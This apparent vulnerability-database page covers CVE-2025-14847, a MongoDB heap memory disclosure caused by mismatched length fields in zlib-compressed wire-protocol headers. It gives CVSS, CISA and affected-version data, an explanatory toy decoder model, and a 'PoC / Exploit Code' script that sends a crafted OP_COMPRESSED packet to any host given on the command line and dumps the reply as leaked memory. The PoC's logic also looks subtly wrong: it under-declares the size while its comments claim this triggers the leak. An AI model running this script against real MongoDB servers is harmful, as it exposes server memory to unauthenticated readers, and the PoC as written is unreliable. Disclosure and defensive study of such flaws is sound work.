Security Vulnerability Report
CVE-2025-14847 CVSS 7.5 HIGH

CVE-2025-14847

Published: 2025-12-19 11:15:49
Last Modified: 2026-01-13 22:24:20

Description

Mismatched length fields in Zlib-compressed protocol headers may allow an unauthenticated client to read uninitialized heap memory. The weakness class recorded for this CVE, CWE-130 (improper handling of length parameter inconsistency), names the mechanism: the length a compressed header declares for the message is not reconciled with what the decompressor actually produced, so buffer contents the server never wrote can end up in its output. This issue affects MongoDB Server 7.0 versions prior to 7.0.28, 8.0 versions prior to 8.0.17, 8.2 versions prior to 8.2.3, 6.0 versions prior to 6.0.27, 5.0 versions prior to 5.0.32 and 4.4 versions prior to 4.4.30, as well as every release of the 4.2, 4.0 and 3.6 branches (4.2.0, 4.0.0 and 3.6.0 onward), for which no fixed version is listed. No authentication is required (PR:N in the CVSS vector), so any client that can reach the listening port can attempt it.
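To make the CWE-130 pattern behind that description concrete, here is an added toy model that is not part of this report and not MongoDB's source: a minimal OP_COMPRESSED encoder and decoder in Python in which the decoder sizes its output buffer from the header's uncompressedSize. `decode_trusting_header` has the vulnerable shape (the whole buffer is handed on even when zlib filled only part of it, so the tail is whatever the allocation previously held, here a 0xA5 marker standing in for stale heap contents), and `decode_checked` has the hardened shape (reject unless zlib produced exactly the declared number of bytes and reached end of stream). The field layout follows the documented wire protocol; the function names, the sample body and the marker byte are constructed for the example, and how the real server lays out its buffers is not claimed here.

```python
"""Toy model of CWE-130 in an OP_COMPRESSED decoder (constructed example, not MongoDB code)."""
import struct
import zlib
from typing import Optional, Tuple

OP_COMPRESSED = 2012
OP_MSG = 2013
COMPRESSOR_ZLIB = 2
# MsgHeader (messageLength, requestID, responseTo, opCode), then the OP_COMPRESSED
# fields originalOpcode (int32), uncompressedSize (int32), compressorId (uint8);
# the compressed bytes follow immediately.
HDR = "<iiiiiiB"
HDR_LEN = struct.calcsize(HDR)  # 25

STALE = 0xA5  # stands in for whatever the heap held before the buffer was allocated


def build_op_compressed(body: bytes, declared_size: Optional[int] = None, request_id: int = 1) -> bytes:
    """Wrap body in OP_COMPRESSED. declared_size overrides uncompressedSize so a
    caller can send a value that does not match the body (the inconsistency CWE-130 describes)."""
    compressed = zlib.compress(body)
    size = len(body) if declared_size is None else declared_size
    header = struct.pack(HDR, HDR_LEN + len(compressed), request_id, 0,
                         OP_COMPRESSED, OP_MSG, size, COMPRESSOR_ZLIB)
    return header + compressed


def parse_op_compressed(msg: bytes) -> Tuple[int, int, bytes]:
    """Outer checks a receiver does before inflating; returns
    (originalOpcode, uncompressedSize, compressedMessage)."""
    if len(msg) < HDR_LEN:
        raise ValueError("short message")
    msg_len, _req, _resp, opcode, orig_opcode, size, compressor = struct.unpack_from(HDR, msg)
    if opcode != OP_COMPRESSED or msg_len != len(msg):
        raise ValueError("bad opCode or messageLength")
    if compressor != COMPRESSOR_ZLIB:
        raise ValueError("only zlib is modelled here")
    if size <= 0:
        raise ValueError("uncompressedSize must be positive")
    return orig_opcode, size, msg[HDR_LEN:]


def decode_trusting_header(size: int, compressed: bytes) -> bytes:
    """Vulnerable shape: allocate `size` bytes, inflate into them, hand the whole
    buffer on. Bytes zlib never wrote still hold their previous contents."""
    if size <= 0:
        raise ValueError("size must be positive")
    buf = bytearray([STALE]) * size                                # "uninitialized" allocation
    produced = zlib.decompressobj().decompress(compressed, size)   # capped like a fixed buffer
    buf[:len(produced)] = produced
    return bytes(buf)


def decode_checked(size: int, compressed: bytes) -> bytes:
    """Hardened shape: inflate with room for one extra byte so oversize output is
    observable, then require exactly `size` bytes and a finished zlib stream."""
    if size <= 0:
        raise ValueError("size must be positive")
    d = zlib.decompressobj()
    produced = d.decompress(compressed, size + 1)
    if len(produced) != size or not d.eof:
        raise ValueError("uncompressedSize does not match decompressed data")
    return produced


def _rejected(size: int, compressed: bytes) -> bool:
    try:
        decode_checked(size, compressed)
    except ValueError:
        return True
    return False


def demo() -> dict:
    body = b"constructed-op_msg-body:" + bytes(range(72))  # 96 bytes of constructed sample data
    honest = build_op_compressed(body)
    over = build_op_compressed(body, declared_size=len(body) + 64)   # claims 160, really 96
    under = build_op_compressed(body, declared_size=32)              # claims 32, really 96

    _, n_ok, c_ok = parse_op_compressed(honest)
    _, n_over, c_over = parse_op_compressed(over)
    _, n_under, c_under = parse_op_compressed(under)

    leaked = decode_trusting_header(n_over, c_over)
    return {
        "honest_roundtrip": decode_checked(n_ok, c_ok) == body,
        "leaked_len": len(leaked),                                   # 96 real bytes + 64 stale
        "leaked_tail_is_stale": leaked[len(body):] == bytes([STALE]) * 64,
        "trusting_truncates_undersize": decode_trusting_header(n_under, c_under) == body[:32],
        "checked_rejects_oversize": _rejected(n_over, c_over),
        "checked_rejects_undersize": _rejected(n_under, c_under),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run directly it prints the six checks: the honest header round-trips through the checked decoder, the header that over-declares by 64 bytes makes the trusting decoder return 64 marker bytes past the real message while the checked decoder raises, and the header that under-declares is silently truncated by the trusting decoder and rejected by the checked one. The one-byte headroom in `decode_checked` is what lets a fixed-size destination detect "more output than declared" without inflating an unbounded amount.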

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS 4.0 (Secondary metric in the NVD record)
8.7 HIGH (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
Weakness
CWE-130 (Improper Handling of Length Parameter Inconsistency)
CISA Known Exploited Vulnerabilities
Added 2025-12-29; BOD 22-01 remediation due 2026-01-19 (apply vendor mitigations or discontinue use of the product)

Configurations (Affected Products)

NVD CPE match ranges (criteria cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:* and cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*), all flagged VULNERABLE:

MongoDB Server 3.6.0 <= version < 4.4.30 (covers the 3.6, 4.0, 4.2 and 4.4 branches; only 4.4 has a fix, 4.4.30)
MongoDB Server 5.0.0 <= version < 5.0.32 (fixed in 5.0.32)
MongoDB Server 6.0.0 <= version < 6.0.27 (fixed in 6.0.27)
MongoDB Server 7.0.0 <= version < 7.0.28 (fixed in 7.0.28)
MongoDB Server 8.0.0 <= version < 8.0.17 (fixed in 8.0.17)
MongoDB Server 8.2.0 <= version < 8.2.3 (fixed in 8.2.3)

Every release of the 4.2 (>= 4.2.0), 4.0 (>= 4.0.0) and 3.6 (>= 3.6.0) branches is affected and no fixed version is listed for them, so hosts on those branches have to move to a patched release of a later branch rather than wait for a point release.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14847 PoC - MongoDB Heap Memory Disclosure via OP_COMPRESSED

This PoC demonstrates the memory disclosure vulnerability in MongoDB's
Zlib compressed protocol handling. Use only for authorized security testing.

Reference: https://jira.mongodb.org/browse/SERVER-115508
"""
import socket
import struct
import sys
import zlib


def create_op_compressed_packet(declared_size, compressed_data):
    """
    Create a MongoDB OP_COMPRESSED packet whose uncompressedSize field is set
    to declared_size instead of the real uncompressed length.

    OP_COMPRESSED format:
      - int32: messageLength    (total message length including header)
      - int32: requestID        (client-generated request identifier)
      - int32: responseTo       (0 for requests)
      - int32: opCode           (2012 for OP_COMPRESSED)
      - int32: originalOpcode   (the opcode of the wrapped message)
      - int32: uncompressedSize (length the server expects after decompression)
      - uint8: compressorId     (0 = noop, 1 = snappy, 2 = zlib, 3 = zstd)
      - bytes: compressedMessage
    """
    opcode = 2012           # OP_COMPRESSED
    original_opcode = 2004  # OP_QUERY (OP_MSG would be 2013)
    compressor = 2          # zlib

    # Body: originalOpcode, the attacker-chosen uncompressedSize, the single-byte
    # compressorId, then the zlib data. compressorId is uint8, not int32.
    body = struct.pack('<iiB', original_opcode, declared_size, compressor) + compressed_data

    # Standard 16-byte MsgHeader; messageLength covers header plus body.
    message_length = 16 + len(body)
    header = struct.pack('<iiii', message_length, 1, 0, opcode)
    return header + body


def exploit_mongodb(target_host, target_port, target_version):
    """
    Send one OP_COMPRESSED message whose uncompressedSize does not match the
    payload, then dump whatever the server sends back.
    """
    print(f"[*] Targeting {target_host}:{target_port}")
    print(f"[*] MongoDB version: {target_version}")
    try:
        # Placeholder payload: not a well-formed wire message, just bytes to compress.
        original_msg = b'\x00\x00\x00\x00'   # stand-in for a message header
        original_msg += b'\x00' * 100        # padding to trigger a heap allocation

        compressed = zlib.compress(original_msg)

        # Declare the compressed length as uncompressedSize. The real decompressed
        # length is len(original_msg), so the two length fields disagree.
        packet = create_op_compressed_packet(len(compressed), compressed)
        print("[*] Sending crafted OP_COMPRESSED packet...")
        print(f"[*] Original size: {len(original_msg)}, Compressed size: {len(compressed)}")

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        sock.sendall(packet)

        # Receive response (may contain leaked heap memory)
        response = sock.recv(4096)
        if response:
            print(f"[+] Received response ({len(response)} bytes)")
            print("[*] Response hex dump:")
            print(response[:256].hex())
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve_2025_14847_poc.py <host> <port> <version>")
        print("Example: python3 cve_2025_14847_poc.py 127.0.0.1 27017 7.0.15")
        sys.exit(1)
    exploit_mongodb(sys.argv[1], int(sys.argv[2]), sys.argv[3])

References

https://jira.mongodb.org/browse/SERVER-115508 (Issue Tracking, Patch, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/12/29/21 (oss-security mailing list post)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14847", "sourceIdentifier": "[email protected]", "published": "2025-12-19T11:15:49.277", "lastModified": "2026-01-13T22:24:20.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "cisaExploitAdd": "2025-12-29", "cisaActionDue": "2026-01-19", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-130"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "4.4.30", "matchCriteriaId": "2FCC5203-4E5E-4B2B-86A1-FD47A097013C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.32", "matchCriteriaId": "CCD1EB22-51EA-4ABC-9E0B-99520670133B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", 
"versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.27", "matchCriteriaId": "41ECB5AB-E6D0-412E-802F-839D53076677"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.28", "matchCriteriaId": "5C9277BB-90FC-4A57-9028-DD57322F1D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.17", "matchCriteriaId": "2F4D674D-CBC0-4412-AF68-6FED8A6394C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.3", "matchCriteriaId": "4302991B-E6CF-4E7B-9B24-BD2355C6F393"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-115508", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/29/21", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing L ... (truncated)